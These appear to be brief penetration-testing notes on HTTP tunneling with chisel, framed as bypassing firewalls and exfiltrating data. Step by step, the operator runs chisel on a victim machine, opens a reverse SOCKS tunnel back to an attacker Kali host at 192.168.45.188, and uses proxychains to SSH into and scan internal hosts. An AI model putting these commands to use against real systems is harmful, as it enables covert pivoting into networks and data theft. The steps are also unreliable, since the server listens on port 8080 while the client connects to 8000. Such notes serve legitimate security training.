HTTP Tunneling
HTTP Tunneling Explained: Bypass Firewalls and Exfiltrate Data Over HTTP
Tunneling with Chisel
Step 1. Download chisel on the target machine by any means possible and execute it.
Look for the system architecture and then download the suitable one form the chisel github
Step 2. Start chisel server in your kali machine
chisel server --port 8080 --reverse
Step 3. On victim machine
./chisel client 192.168.45.188:8000 R:socks
Step 4. Set your proxy chains configuration to 1080
sudo vi /etc/proxychains4.conf
Step 5. Connect /scan and perform other actions
proxychains ssh user@10.10.10.1
📓 References
- Benheater - Great resource for learning chisel.